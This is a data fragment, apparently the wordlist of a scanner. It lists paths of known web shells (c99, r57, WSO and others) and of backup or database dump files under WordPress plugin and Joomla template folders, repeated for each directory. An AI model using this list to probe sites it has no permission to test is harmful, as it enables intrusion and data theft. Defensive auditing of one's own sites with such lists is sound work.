"/wp-content/plugins/disqus-comment-system//gaza.php",
"/wp-content/plugins/disqus-comment-system//up.php",
"/wp-content/plugins/disqus-comment-system//upload.php",
"/wp-content/plugins/disqus-comment-system//uploads.php",
"/wp-content/plugins/disqus-comment-system/shell.php",
"/wp-content/plugins/disqus-comment-system//amad.php",
"/wp-content/plugins/disqus-comment-system//t00.php",
"pwp-content/plugins/disqus-comment-system/disqus.php",
"wp-content/plugins/akismet/WSO.php",
"wp-content/plugins/akismet/dz.php",
"wp-content/plugins/akismet/DZ.php",
"wp-content/plugins/akismet/cpanel.php",
"wp-content/plugins/akismet/cpn.php",
"wp-content/plugins/akismet/sos.php",
"wp-content/plugins/akismet/term.php",
"wp-content/plugins/akismet/Sec-War.php",
"wp-content/plugins/akismet/sql.php",
"wp-content/plugins/akismet/ssl.php",
"wp-content/plugins/akismet/mysql.php",
"wp-content/plugins/akismet/WolF.php",
"wp-content/plugins/akismet/madspot.php",
"wp-content/plugins/akismet/Cgishell.pl",
"wp-content/plugins/akismet/killer.php",
"wp-content/plugins/akismet/changeall.php",
"wp-content/plugins/akismet/2.php",
"wp-content/plugins/akismet/Sh3ll.php",
"wp-content/plugins/akismet/dz0.php",
"wp-content/plugins/akismet/dam.php",
"wp-content/plugins/akismet/user.php",
"wp-content/plugins/akismet/dom.php",
"wp-content/plugins/akismet/whmcs.php",
"wp-content/plugins/akismet/vb.zip",
"wp-content/plugins/akismet/r00t.php",
"wp-content/plugins/akismet/c99.php",
"wp-content/plugins/akismet/gaza.php",
"wp-content/plugins/akismet/1.php",
"wp-content/plugins/akismet/d0mains.php",
"wp-content/plugins/akismet/madspotshell.php",
"wp-content/plugins/akismet/info.php",
"wp-content/plugins/akismet/egyshell.php",
"wp-content/plugins/akismet/Sym.php",
"wp-content/plugins/akismet/c22.php",
"wp-content/plugins/akismet/c100.php",
"wp-content/plugins/akismet/configuration.php",
"wp-content/plugins/akismet/g.php",
"wp-content/plugins/akismet/xx.pl",
"wp-content/plugins/akismet/ls.php",
"wp-content/plugins/akismet/Cpanel.php",
"wp-content/plugins/akismet/k.php",
"wp-content/plugins/akismet/zone-h.php",
"wp-content/plugins/akismet/tmp/user.php",
"wp-content/plugins/akismet/tmp/Sym.php",
"wp-content/plugins/akismet/cp.php",
"wp-content/plugins/akismet/tmp/madspotshell.php",
"wp-content/plugins/akismet/tmp/root.php",
"wp-content/plugins/akismet/tmp/whmcs.php",
"wp-content/plugins/akismet/tmp/index.php",
"wp-content/plugins/akismet/tmp/2.php",
"wp-content/plugins/akismet/tmp/dz.php",
"wp-content/plugins/akismet/tmp/cpn.php",
"wp-content/plugins/akismet/tmp/changeall.php",
"wp-content/plugins/akismet/tmp/Cgishell.pl",
"wp-content/plugins/akismet/tmp/sql.php",
"wp-content/plugins/akismet/0day.php",
"wp-content/plugins/akismet/tmp/admin.php",
"wp-content/plugins/akismet/L3b.php",
"wp-content/plugins/akismet/d.php",
"wp-content/plugins/akismet/tmp/d.php",
"wp-content/plugins/akismet/tmp/L3b.php",
"wp-content/plugins/akismet/sado.php",
"wp-content/plugins/akismet/admin1.php",
"wp-content/plugins/akismet/upload.php",
"wp-content/plugins/akismet/up.php",
"wp-content/plugins/akismet/vb.zip",
"wp-content/plugins/akismet/vb.rar",
"wp-content/plugins/akismet/admin2.asp",
"wp-content/plugins/akismet/uploads.php",
"wp-content/plugins/akismet/sa.php",
"wp-content/plugins/akismet/sysadmins/",
"wp-content/plugins/akismet/admin1/",
"wp-content/plugins/akismet/sniper.php",
"wp-content/plugins/akismet/images/Sym.php",
"wp-content/plugins/akismet//r57.php",
"wp-content/plugins/akismet/gzaa_spysl",
"wp-content/plugins/akismet/sql-new.php",
"wp-content/plugins/akismet//shell.php",
"wp-content/plugins/akismet//sa.php",
"wp-content/plugins/akismet//admin.php",
"wp-content/plugins/akismet//sa2.php",
"wp-content/plugins/akismet//2.php",
"wp-content/plugins/akismet//gaza.php",
"wp-content/plugins/akismet//up.php",
"wp-content/plugins/akismet//upload.php",
"wp-content/plugins/akismet//uploads.php",
"wp-content/plugins/akismet/shell.php",
"wp-content/plugins/akismet//amad.php",
"wp-content/plugins/akismet//t00.php",
"wp-content/plugins/akismet//dz.php",
"wp-content/plugins/akismet//site.rar",
"wp-content/plugins/akismet//Black.php",
"wp-content/plugins/akismet//site.tar.gz",
"wp-content/plugins/akismet//home.zip",
"wp-content/plugins/akismet//home.rar",
"wp-content/plugins/akismet//home.tar",
"wp-content/plugins/akismet//home.tar.gz",
"wp-content/plugins/akismet//forum.zip",
"wp-content/plugins/akismet//forum.rar",
"wp-content/plugins/akismet//forum.tar",
"wp-content/plugins/akismet//forum.tar.gz",
"wp-content/plugins/akismet//test.txt",
"wp-content/plugins/akismet//ftp.txt",
"wp-content/plugins/akismet//user.txt",
"wp-content/plugins/akismet//site.txt",
"wp-content/plugins/akismet//error_log",
"wp-content/plugins/akismet//error",
"wp-content/plugins/akismet//cpanel",
"wp-content/plugins/akismet//awstats",
"wp-content/plugins/akismet//site.sql",
"wp-content/plugins/akismet//vb.sql",
"wp-content/plugins/akismet//forum.sql",
"wp-content/plugins/akismet/r00t-s3c.php",
"wp-content/plugins/akismet/c.php",
"wp-content/plugins/akismet//backup.sql",
"wp-content/plugins/akismet//back.sql",
"wp-content/plugins/akismet//data.sql",
"wp-content/plugins/akismet/wp.rar/",
"wp-content/plugins/akismet/asp.aspx",
"wp-content/plugins/akismet/tmp/vaga.php",
"wp-content/plugins/akismet/tmp/killer.php",
"wp-content/plugins/akismet/whmcs.php",
"wp-content/plugins/akismet/abuhlail.php",
"wp-content/plugins/akismet/tmp/killer.php",
"wp-content/plugins/akismet/tmp/domaine.pl",
"wp-content/plugins/akismet/tmp/domaine.php",
"wp-content/plugins/akismet/useradmin/",
"wp-content/plugins/akismet/tmp/d0maine.php",
"wp-content/plugins/akismet/d0maine.php",
"wp-content/plugins/akismet/tmp/sql.php",
"wp-content/plugins/akismet/X.php",
"wp-content/plugins/akismet/123.php",
"wp-content/plugins/akismet/m.php",
"wp-content/plugins/akismet/b.php",
"wp-content/plugins/akismet/up.php",
"wp-content/plugins/akismet/tmp/dz1.php",
"wp-content/plugins/akismet/dz1.php",
"wp-content/plugins/akismet/forum.zip",
"wp-content/plugins/akismet/Symlink.php",
"wp-content/plugins/akismet/Symlink.pl",
"wp-content/plugins/akismet/forum.rar",
"wp-content/plugins/akismet/joomla.zip",
"wp-content/plugins/akismet/joomla.rar",
"wp-content/plugins/akismet/wp.php",
"wp-content/plugins/akismet/buck.sql",
"wp-content/plugins/akismet/sysadmin.php",
"wp-content/plugins/akismet/images/c99.php",
"wp-content/plugins/akismet/xd.php",
"wp-content/plugins/akismet/c100.php",
"wp-content/plugins/akismet/spy.aspx",
"wp-content/plugins/akismet/xd.php",
"wp-content/plugins/akismet/tmp/xd.php",
"wp-content/plugins/akismet/sym/root/home/",
"wp-content/plugins/akismet/billing/killer.php",
"wp-content/plugins/akismet/tmp/upload.php",
"wp-content/plugins/akismet/tmp/admin.php",
"wp-content/plugins/akismet/Server.php",
"wp-content/plugins/akismet/tmp/uploads.php",
"wp-content/plugins/akismet/tmp/up.php",
"wp-content/plugins/akismet/Server/",
"wp-content/plugins/akismet/wp-admin/c99.php",
"wp-content/plugins/akismet/tmp/priv8.php",
"wp-content/plugins/akismet/priv8.php",
"wp-content/plugins/akismet/cgi.pl/",
"wp-content/plugins/akismet/tmp/cgi.pl",
"wp-content/plugins/akismet/downloads/dom.php",
"wp-content/plugins/akismet/webadmin.html",
"wp-content/plugins/akismet/admins.php",
"wp-content/plugins/akismet/bluff.php",
"wp-content/plugins/akismet/king.jeen",
"wp-content/plugins/akismet/admins/",
"wp-content/plugins/akismet/admins.asp",
"wp-content/plugins/akismet/admins.php",
"wp-content/plugins/akismet/wp.zip",
"wp-content/plugins/akismet/disqus.php",
"wp-content/plugins/google-sitemap-generator//cpanel",
"wp-content/plugins/google-sitemap-generator//awstats",
"wp-content/plugins/google-sitemap-generator//site.sql",
"wp-content/plugins/google-sitemap-generator//vb.sql",
"wp-content/plugins/google-sitemap-generator//forum.sql",
"wp-content/plugins/google-sitemap-generator/r00t-s3c.php",
"wp-content/plugins/google-sitemap-generator/c.php",
"wp-content/plugins/google-sitemap-generator//backup.sql",
"wp-content/plugins/google-sitemap-generator//back.sql",
"wp-content/plugins/google-sitemap-generator//data.sql",
"wp-content/plugins/google-sitemap-generator/wp.rar/",
"wp-content/plugins/google-sitemap-generator/asp.aspx",
"wp-content/plugins/google-sitemap-generator/tmp/vaga.php",
"wp-content/plugins/google-sitemap-generator/tmp/killer.php",
"wp-content/plugins/google-sitemap-generator/whmcs.php",
"wp-content/plugins/google-sitemap-generator/abuhlail.php",
"wp-content/plugins/google-sitemap-generator/tmp/killer.php",
"wp-content/plugins/google-sitemap-generator/tmp/domaine.pl",
"wp-content/plugins/google-sitemap-generator/tmp/domaine.php",
"wp-content/plugins/google-sitemap-generator/useradmin/",
"wp-content/plugins/google-sitemap-generator/tmp/d0maine.php",
"wp-content/plugins/google-sitemap-generator/d0maine.php",
"wp-content/plugins/google-sitemap-generator/tmp/sql.php",
"wp-content/plugins/google-sitemap-generator/X.php",
"wp-content/plugins/google-sitemap-generator/123.php",
"wp-content/plugins/google-sitemap-generator/m.php",
"wp-content/plugins/google-sitemap-generator/b.php",
"wp-content/plugins/google-sitemap-generator/up.php",
"wp-content/plugins/google-sitemap-generator/tmp/dz1.php",
"wp-content/plugins/google-sitemap-generator/dz1.php",
"wp-content/plugins/google-sitemap-generator/forum.zip",
"wp-content/plugins/google-sitemap-generator/Symlink.php",
"wp-content/plugins/google-sitemap-generator/Symlink.pl",
"wp-content/plugins/google-sitemap-generator/forum.rar",
"wp-content/plugins/google-sitemap-generator/joomla.zip",
"wp-content/plugins/google-sitemap-generator/joomla.rar",
"wp-content/plugins/google-sitemap-generator/wp.php",
"wp-content/plugins/google-sitemap-generator/buck.sql",
"wp-content/plugins/google-sitemap-generator/sysadmin.php",
"wp-content/plugins/google-sitemap-generator/images/c99.php",
"wp-content/plugins/google-sitemap-generator/xd.php",
"wp-content/plugins/google-sitemap-generator/c100.php",
"wp-content/plugins/google-sitemap-generator/spy.aspx",
"wp-content/plugins/google-sitemap-generator/xd.php",
"wp-content/plugins/google-sitemap-generator/tmp/xd.php",
"wp-content/plugins/google-sitemap-generator/sym/root/home/",
"wp-content/plugins/google-sitemap-generator/billing/killer.php",
"wp-content/plugins/google-sitemap-generator/tmp/upload.php",
"wp-content/plugins/google-sitemap-generator/tmp/admin.php",
"wp-content/plugins/google-sitemap-generator/Server.php",
"wp-content/plugins/google-sitemap-generator/tmp/uploads.php",
"wp-content/plugins/google-sitemap-generator/tmp/up.php",
"wp-content/plugins/google-sitemap-generator/Server/",
"wp-content/plugins/google-sitemap-generator/wp-admin/c99.php",
"wp-content/plugins/google-sitemap-generator/tmp/priv8.php",
"wp-content/plugins/google-sitemap-generator/priv8.php",
"wp-content/plugins/google-sitemap-generator/cgi.pl/",
"wp-content/plugins/google-sitemap-generator/tmp/cgi.pl",
"wp-content/plugins/google-sitemap-generator/downloads/dom.php",
"wp-content/plugins/google-sitemap-generator/webadmin.html",
"wp-content/plugins/google-sitemap-generator/admins.php",
"wp-content/plugins/google-sitemap-generator/bluff.php",
"wp-content/plugins/google-sitemap-generator/king.jeen",
"wp-content/plugins/google-sitemap-generator/admins/",
"wp-content/plugins/google-sitemap-generator/admins.asp",
"wp-content/plugins/google-sitemap-generator/admins.php",
"wp-content/plugins/google-sitemap-generator/wp.zip",
"wp-content/plugins/google-sitemap-generator/sitemap-core.php",
"/templates/beez/WSO.php",
"/templates/beez/dz.php",
"/templates/beez/DZ.php",
"/templates/beez/cpanel.php",
"/templates/beez/cpn.php",
"/templates/beez/sos.php",
"/templates/beez/term.php",
"/templates/beez/Sec-War.php",
"/templates/beez/sql.php",
"/templates/beez/ssl.php",
"/templates/beez/mysql.php",
"/templates/beez/WolF.php",
"/templates/beez/madspot.php",
"/templates/beez/Cgishell.pl",
"/templates/beez/killer.php",
"/templates/beez/changeall.php",
"/templates/beez/2.php",
"/templates/beez/Sh3ll.php",
"/templates/beez/dz0.php",
"/templates/beez/dam.php",
"/templates/beez/user.php",
"/templates/beez/dom.php",
"/templates/beez/whmcs.php",
"/templates/beez/vb.zip",
"/templates/beez/r00t.php",
"/templates/beez/c99.php",
"/templates/beez/gaza.php",
"/templates/beez/1.php",
"/templates/beez/d0mains.php",
"/templates/beez/madspotshell.php",
"/templates/beez/info.php",
"/templates/beez/egyshell.php",
"/templates/beez/Sym.php",
"/templates/beez/c22.php",
"/templates/beez/c100.php",
"/templates/beez/configuration.php",
"/templates/beez/g.php",
"/templates/beez/xx.pl",
"/templates/beez/ls.php",
"/templates/beez/Cpanel.php",
"/templates/beez/k.php",
"/templates/beez/zone-h.php",
"/templates/beez/tmp/user.php",
"/templates/beez/tmp/Sym.php",
"/templates/beez/cp.php",
"/templates/beez/tmp/madspotshell.php",
"/templates/beez/tmp/root.php",
"/templates/beez/tmp/whmcs.php",
"/templates/beez/tmp/index.php",
"/templates/beez/tmp/2.php",
"/templates/beez/tmp/dz.php",
"/templates/beez/tmp/cpn.php",
"/templates/beez/tmp/changeall.php",
"/templates/beez/tmp/Cgishell.pl",
"/templates/beez/tmp/sql.php",
"/templates/beez/0day.php",
"/templates/beez/tmp/admin.php",
"/templates/beez/L3b.php",
"/templates/beez/d.php",
"/templates/beez/tmp/d.php",
"/templates/beez/tmp/L3b.php",
"/templates/beez/sado.php",
"/templates/beez/admin1.php",
"/templates/beez/upload.php",
"/templates/beez/up.php",
"/templates/beez/vb.zip",
"/templates/beez/vb.rar",
"/templates/beez/admin2.asp",
"/templates/beez/uploads.php",
"/templates/beez/sa.php",
"/templates/beez/sysadmins/",
"/templates/beez/admin1/",
"/templates/beez/sniper.php",
"/templates/beez/images/Sym.php",
"/templates/beez//r57.php",
"/templates/beez/gzaa_spysl",
"/templates/beez/sql-new.php",
"/templates/beez//shell.php",
"/templates/beez//sa.php",
"/templates/beez//admin.php",
"/templates/beez//sa2.php",
"/templates/beez//2.php",
"/templates/beez//gaza.php",
"/templates/beez//up.php",
"/templates/beez//upload.php",
"/templates/beez//uploads.php",
"/templates/beez/shell.php",
"/templates/beez//amad.php",
"/templates/beez//t00.php",
"/templates/beez//dz.php",
"/templates/beez//site.rar",
"/templates/beez//Black.php",
"/templates/beez//site.tar.gz",
"/templates/beez//home.zip",
"/templates/beez//home.rar",
"/templates/beez//home.tar",
"/templates/beez//home.tar.gz",
"/templates/beez//forum.zip",
"/templates/beez//forum.rar",
"/templates/beez//forum.tar",
"/templates/beez//forum.tar.gz",
"/templates/beez//test.txt",
"/templates/beez//ftp.txt",
"/templates/beez//user.txt",
"/templates/beez//site.txt",
"/templates/beez//error_log",
"/templates/beez//error",
"/templates/beez//cpanel",
"/templates/beez//awstats",
"/templates/beez//site.sql",
"/templates/beez//vb.sql",
"/templates/beez//forum.sql",
"/templates/beez/r00t-s3c.php",
"/templates/beez/c.php",
"/templates/beez//backup.sql",
"/templates/beez//back.sql",
"/templates/beez//data.sql",
"/templates/beez/wp.rar/",
"/templates/beez/asp.aspx",
"/templates/beez/tmp/vaga.php",
"/templates/beez/tmp/killer.php",
"/templates/beez/whmcs.php",
"/templates/beez/abuhlail.php",
"/templates/beez/tmp/killer.php",
"/templates/beez/tmp/domaine.pl",
"/templates/beez/tmp/domaine.php",
"/templates/beez/useradmin/",
"/templates/beez/tmp/d0maine.php",
"/templates/beez/d0maine.php",
"/templates/beez/tmp/sql.php",
"/templates/beez/X.php",
"/templates/beez/123.php",
"/templates/beez/m.php",
"/templates/beez/b.php",
"/templates/beez/up.php",
"/templates/beez/tmp/dz1.php",
"/templates/beez/dz1.php",
"/templates/beez/forum.zip",
"/templates/beez/Symlink.php",
"/templates/beez/Symlink.pl",
"/templates/beez/forum.rar",
"/templates/beez/joomla.zip",
"/templates/beez/joomla.rar",
"/templates/beez/wp.php",
"/templates/beez/buck.sql",
"/templates/beez/sysadmin.php",
"/templates/beez/images/c99.php",
"/templates/beez/xd.php",
"/templates/beez/c100.php",
"/templates/beez/spy.aspx",
"/templates/beez/xd.php",
"/templates/beez/tmp/xd.php",
"/templates/beez/sym/root/home/",
"/templates/beez/billing/killer.php",
"/templates/beez/tmp/upload.php",
"/templates/beez/tmp/admin.php",
"/templates/beez/Server.php",
"/templates/beez/tmp/uploads.php",
"/templates/beez/tmp/up.php",
"/templates/beez/Server/",
"/templates/beez/wp-admin/c99.php",
"/templates/beez/tmp/priv8.php",
"/templates/beez/priv8.php",
"/templates/beez/cgi.pl/",
"/templates/beez/tmp/cgi.pl",
"/templates/beez/downloads/dom.php",
"/templates/beez/webadmin.html",
"/templates/beez/admins.php",
"/templates/beez/bluff.php",
"/templates/beez/king.jeen",
"/templates/beez/admins/",
"/templates/beez/admins.asp",
"/templates/beez/admins.php",
"/templates/beez/wp.zip",
"/templates/beez/index.php","/images/WSO.php",
"/images/dz.php",
"/images/DZ.php",
"/images/cpanel.php",
"/images/cpn.php",
"/images/sos.php",
"/images/term.php",
"/images/Sec-War.php",
"/images/sql.php",
"/images/ssl.php",
"/images/mysql.php",
"/images/WolF.php",
"/images/madspot.php",
"/images/Cgishell.pl",
"/images/killer.php",
"/images/changeall.php",
"/images/2.php",
"/images/Sh3ll.php",
"/images/dz0.php",
"/images/dam.php",
"/images/user.php",
"/images/dom.php",
"/images/whmcs.php",
"/images/vb.zip",
"/images/r00t.php",
"/images/c99.php",
"/images/gaza.php",
"/images/1.php",
"/images/d0mains.php",
"/images/madspotshell.php",
"/images/info.php",
"/images/egyshell.php",
"/images/Sym.php",
"/images/c22.php",
"/images/c100.php",
"/images/configuration.php",
"/images/g.php",
"/images/xx.pl",
"/images/ls.php",
"/images/Cpanel.php",
"/images/k.php",
"/images/zone-h.php",
"/images/tmp/user.php",
"/images/tmp/Sym.php",
"/images/cp.php",
"/images/tmp/madspotshell.php",
"/images/tmp/root.php",
"/images/tmp/whmcs.php",
"/images/tmp/index.php",
"/images/tmp/2.php",
"/images/tmp/dz.php",
"/images/tmp/cpn.php",
"/images/tmp/changeall.php",
"/images/tmp/Cgishell.pl",
"/images/tmp/sql.php",
"/images/0day.php",
"/images/tmp/admin.php",
"/images/L3b.php",
"/images/d.php",
"/images/tmp/d.php",
"/images/tmp/L3b.php",
"/images/sado.php",
"/images/admin1.php",
"/images/upload.php",
"/images/up.php",
"/images/vb.zip",
"/images/vb.rar",
"/images/admin2.asp",
"/images/uploads.php",
"/images/sa.php",
"/images/sysadmins/",
"/images/admin1/",
"/images/sniper.php",
"/images/images/Sym.php",
"/images//r57.php",
"/images/gzaa_spysl",
"/images/sql-new.php",
"/images//shell.php",
"/images//sa.php",
"/images//admin.php",
"/images//sa2.php",
"/images//2.php",
"/images//gaza.php",
"/images//up.php",
"/images//upload.php",
"/images//uploads.php",
"/images/shell.php",
"/images//amad.php",
"/images//t00.php",
"/images//dz.php",
"/images//site.rar",
"/images//Black.php",
"/images//site.tar.gz",
"/images//home.zip",
"/images//home.rar",
"/images//home.tar",
"/images//home.tar.gz",
"/images//forum.zip",
"/images//forum.rar",
"/images//forum.tar",
"/images//forum.tar.gz",
"/images//test.txt",
"/images//ftp.txt",
"/images//user.txt",
"/images//site.txt",
"/images//error_log",
"/images//error",
"/images//cpanel",
"/images//awstats",
"/images//site.sql",
"/images//vb.sql",
"/images//forum.sql",
"/images/r00t-s3c.php",
"/images/c.php",
"/images//backup.sql",
"/images//back.sql",
"/images//data.sql",
"/images/wp.rar/",
"/images/asp.aspx",
"/images/tmp/vaga.php",
"/images/tmp/killer.php",
"/images/whmcs.php",
"/images/abuhlail.php",
"/images/tmp/killer.php",
"/images/tmp/domaine.pl",
"/images/tmp/domaine.php",
"/images/useradmin/",
"/images/tmp/d0maine.php",
"/images/d0maine.php",
"/images/tmp/sql.php",
"/images/X.php",
"/images/123.php",
"/images/m.php",
"/images/b.php",
"/images/up.php",
"/images/tmp/dz1.php",
"/images/dz1.php",
"/images/forum.zip",
"/images/Symlink.php",
"/images/Symlink.pl",
"/images/forum.rar",
"/images/joomla.zip",
"/images/joomla.rar",
"/images/wp.php",
"/images/buck.sql",
"/includes/WSO.php",
"/includes/dz.php",
"/includes/DZ.php",
"/includes/cpanel.php",
"/includes/cpn.php",
"/includes/sos.php",
"/includes/term.php",
"/includes/Sec-War.php",
"/includes/sql.php",
"/includes/ssl.php",
"/includes/mysql.php",
"/includes/WolF.php",
"/includes/madspot.php",
"/includes/Cgishell.pl",
"/includes/killer.php",
"/includes/changeall.php",
"/includes/2.php",
"/includes/Sh3ll.php",
"/includes/dz0.php",
"/includes/dam.php",
"/includes/user.php",
"/includes/dom.php",
"/includes/whmcs.php",
"/includes/vb.zip",
"/includes/r00t.php",
"/includes/c99.php",
"/includes/gaza.php",
"/includes/1.php",
"/includes/d0mains.php",
"/includes/madspotshell.php",
"/includes/info.php",
"/includes/egyshell.php",
"/includes/Sym.php",
"/includes/c22.php",
"/includes/c100.php",
"/includes/configuration.php",
"/includes/g.php",
"/includes/xx.pl",
"/includes/ls.php",
"/includes/Cpanel.php",
"/includes/k.php",
"/includes/zone-h.php",
"/includes/tmp/user.php",
"/includes/tmp/Sym.php",
"/includes/cp.php",
"/includes/tmp/madspotshell.php",
"/includes/tmp/root.php",
"/includes/tmp/whmcs.php",
"/includes/tmp/index.php",
"/includes/tmp/2.php",
"/includes/tmp/dz.php",
"/includes/tmp/cpn.php",
"/includes/tmp/changeall.php",
"/includes/tmp/Cgishell.pl",
"/includes/tmp/sql.php",
"/includes/0day.php",
"/includes/tmp/admin.php",
"/includes/L3b.php",
"/includes/d.php",
"/includes/tmp/d.php",
"/includes/tmp/L3b.php",
"/includes/sado.php",
"/includes/admin1.php",
"/includes/upload.php",
"/includes/up.php",
"/includes/vb.zip",
"/includes/vb.rar",
"/includes/admin2.asp",
"/includes/uploads.php",
"/includes/sa.php",
"/includes/sysadmins/",
"/includes/admin1/",
"/includes/sniper.php",
"/includes/images/Sym.php",
"/includes//r57.php",
"/includes/gzaa_spysl",
"/includes/sql-new.php",
"/includes//shell.php",
"/includes//sa.php",
"/includes//admin.php",
"/includes//sa2.php",
"/includes//2.php",
"/includes//gaza.php",
"/includes//up.php",
"/includes//upload.php",
"/includes//uploads.php",
"/includes/shell.php",
"/includes//amad.php",
"/includes//t00.php",
"/includes//dz.php",
"/includes//site.rar",
"/includes//Black.php",
"/includes//site.tar.gz",
"/includes//home.zip",
"/includes//home.rar",
"/includes//home.tar",
"/includes//home.tar.gz",
"/includes//forum.zip",
"/includes//forum.rar",
"/includes//forum.tar",
"/includes//forum.tar.gz",
"/includes//test.txt",
"/includes//ftp.txt",
"/includes//user.txt",
"/includes//site.txt",
"/includes//error_log",
"/includes//error",
"/includes//cpanel",
"/includes//awstats",
"/includes//site.sql",
"/includes//vb.sql",
"/includes//forum.sql",
"/includes/r00t-s3c.php",
"/includes/c.php",
"/includes//backup.sql",
"/includes//back.sql",
"/includes//data.sql",
"/includes/wp.rar/",
"/includes/asp.aspx",
"/includes/tmp/vaga.php",
"/includes/tmp/killer.php",
"/includes/whmcs.php",
"/includes/abuhlail.php",
"/includes/tmp/killer.php",
"/includes/tmp/domaine.pl",
"/includes/tmp/domaine.php",
"/includes/useradmin/",
"/includes/tmp/d0maine.php",
"/includes/d0maine.php",
"/includes/tmp/sql.php",
"/includes/X.php",
"/includes/123.php",
"/includes/m.php",
"/includes/b.php",
"/includes/up.php",
"/includes/tmp/dz1.php",
"/includes/dz1.php",
"/includes/forum.zip",
"/includes/Symlink.php",
"/includes/Symlink.pl",
"/includes/forum.rar",
"/includes/joomla.zip",
"/includes/joomla.rar",
"/includes/wp.php",
"/includes/buck.sql",
"/includes/sysadmin.php",
"/includes/images/c99.php",
"/includes/xd.php",
"/includes/c100.php",
"/includes/spy.aspx",
"/includes/xd.php",
"/includes/tmp/xd.php",
"/includes/sym/root/home/",
"/includes/billing/killer.php",
"/includes/tmp/upload.php",
"/includes/tmp/admin.php",
"/includes/Server.php",
"/includes/tmp/uploads.php",
"/includes/tmp/up.php",
"/includes/Server/",
"/includes/wp-admin/c99.php",
"/includes/tmp/priv8.php",
"/includes/priv8.php",
"/includes/cgi.pl/",
"/includes/tmp/cgi.pl",
"/includes/downloads/dom.php",
"/includes/webadmin.html",
"/includes/admins.php",
"/includes/bluff.php",
"/includes/king.jeen",
"/includes/admins/",
"/includes/admins.asp",
"/includes/admins.php",
"/includes/wp.zip",
"/includes/",
"/templates/rhuk_milkyway/WSO.php",
"/templates/rhuk_milkyway/dz.php",
"/templates/rhuk_milkyway/DZ.php",
"/templates/rhuk_milkyway/cpanel.php",
"/templates/rhuk_milkyway/cpn.php",
"/templates/rhuk_milkyway/sos.php",
"/templates/rhuk_milkyway/term.php",
"/templates/rhuk_milkyway/Sec-War.php",
"/templates/rhuk_milkyway/sql.php",
"/templates/rhuk_milkyway/ssl.php",
"/templates/rhuk_milkyway/mysql.php",
"/templates/rhuk_milkyway/WolF.php",
"/templates/rhuk_milkyway/madspot.php",
"/templates/rhuk_milkyway/Cgishell.pl",
"/templates/rhuk_milkyway/killer.php",
"/templates/rhuk_milkyway/changeall.php",
"/templates/rhuk_milkyway/2.php",
"/templates/rhuk_milkyway/Sh3ll.php",
"/templates/rhuk_milkyway/dz0.php",
"/templates/rhuk_milkyway/dam.php",
"/templates/rhuk_milkyway/user.php",
"/templates/rhuk_milkyway/dom.php",
"/templates/rhuk_milkyway/whmcs.php",
"/templates/rhuk_milkyway/vb.zip",
"/templates/rhuk_milkyway/r00t.php",
"/templates/rhuk_milkyway/c99.php",
"/templates/rhuk_milkyway/gaza.php",
"/templates/rhuk_milkyway/1.php",
"/templates/rhuk_milkyway/d0mains.php",
"/templates/rhuk_milkyway/madspotshell.php",
"/templates/rhuk_milkyway/info.php",
"/templates/rhuk_milkyway/egyshell.php",
"/templates/rhuk_milkyway/Sym.php",
"/templates/rhuk_milkyway/c22.php",
"/templates/rhuk_milkyway/c100.php",
"/templates/rhuk_milkyway/configuration.php",
"/templates/rhuk_milkyway/g.php",
"/templates/rhuk_milkyway/xx.pl",
"/templates/rhuk_milkyway/ls.php",
"/templates/rhuk_milkyway/Cpanel.php",
"/templates/rhuk_milkyway/k.php",
"/templates/rhuk_milkyway/zone-h.php",
"/templates/rhuk_milkyway/tmp/user.php",
"/templates/rhuk_milkyway/tmp/Sym.php",
"/templates/rhuk_milkyway/cp.php",
"/templates/rhuk_milkyway/tmp/madspotshell.php",
"/templates/rhuk_milkyway/tmp/root.php",
"/templates/rhuk_milkyway/tmp/whmcs.php",
"/templates/rhuk_milkyway/tmp/index.php",
"/templates/rhuk_milkyway/tmp/2.php",
"/templates/rhuk_milkyway/tmp/dz.php",
"/templates/rhuk_milkyway/tmp/cpn.php",
"/templates/rhuk_milkyway/tmp/changeall.php",
"/templates/rhuk_milkyway/tmp/Cgishell.pl",
"/templates/rhuk_milkyway/tmp/sql.php",
"/templates/rhuk_milkyway/0day.php",
"/templates/rhuk_milkyway/tmp/admin.php",
"/templates/rhuk_milkyway/L3b.php",
"/templates/rhuk_milkyway/d.php",
"/templates/rhuk_milkyway/tmp/d.php",
"/templates/rhuk_milkyway/tmp/L3b.php",
"/templates/rhuk_milkyway/sado.php",
"/templates/rhuk_milkyway/admin1.php",
"/templates/rhuk_milkyway/upload.php",
"/templates/rhuk_milkyway/up.php",
"/templates/rhuk_milkyway/vb.zip",
"/templates/rhuk_milkyway/vb.rar",
"/templates/rhuk_milkyway/admin2.asp",
"/templates/rhuk_milkyway/uploads.php",
"/templates/rhuk_milkyway/sa.php",
"/templates/rhuk_milkyway/sysadmins/",
"/templates/rhuk_milkyway/admin1/",
"/templates/rhuk_milkyway/sniper.php",
"/templates/rhuk_milkyway/images/Sym.php",
"/templates/rhuk_milkyway//r57.php",
"/templates/rhuk_milkyway/gzaa_spysl",
"/templates/rhuk_milkyway/sql-new.php",
"/templates/rhuk_milkyway//shell.php",
"/templates/rhuk_milkyway//sa.php",
"/templates/rhuk_milkyway//admin.php",
"/templates/rhuk_milkyway//sa2.php",
"/templates/rhuk_milkyway//2.php",
"/templates/rhuk_milkyway//gaza.php",
"/templates/rhuk_milkyway//up.php",
"/templates/rhuk_milkyway//upload.php",
"/templates/rhuk_milkyway//uploads.php",
"/templates/rhuk_milkyway/shell.php",
"/templates/rhuk_milkyway//amad.php",
"/templates/rhuk_milkyway//t00.php",
"/templates/rhuk_milkyway//dz.php",
"/templates/rhuk_milkyway//site.rar",
"/templates/rhuk_milkyway//Black.php",
"/templates/rhuk_milkyway//site.tar.gz",
"/templates/rhuk_milkyway//home.zip",
"/templates/rhuk_milkyway//home.rar",
"/templates/rhuk_milkyway//home.tar",
"/templates/rhuk_milkyway//home.tar.gz",
"/templates/rhuk_milkyway//forum.zip",
"/templates/rhuk_milkyway//forum.rar",
"/templates/rhuk_milkyway//forum.tar",
"/templates/rhuk_milkyway//forum.tar.gz",
"/templates/rhuk_milkyway//test.txt",
"/templates/rhuk_milkyway//ftp.txt",
"/templates/rhuk_milkyway//user.txt",
"/templates/rhuk_milkyway//site.txt",
"/templates/rhuk_milkyway//error_log",
"/templates/rhuk_milkyway//error",
"/templates/rhuk_milkyway//cpanel",
"/templates/rhuk_milkyway//awstats",
"/templates/rhuk_milkyway//site.sql",
"/templates/rhuk_milkyway//vb.sql",
"/templates/rhuk_milkyway//forum.sql",
"/templates/rhuk_milkyway/r00t-s3c.php",
"/templates/rhuk_milkyway/c.php",
"/templates/rhuk_milkyway//backup.sql",
"/templates/rhuk_milkyway//back.sql",
"/templates/rhuk_milkyway//data.sql",
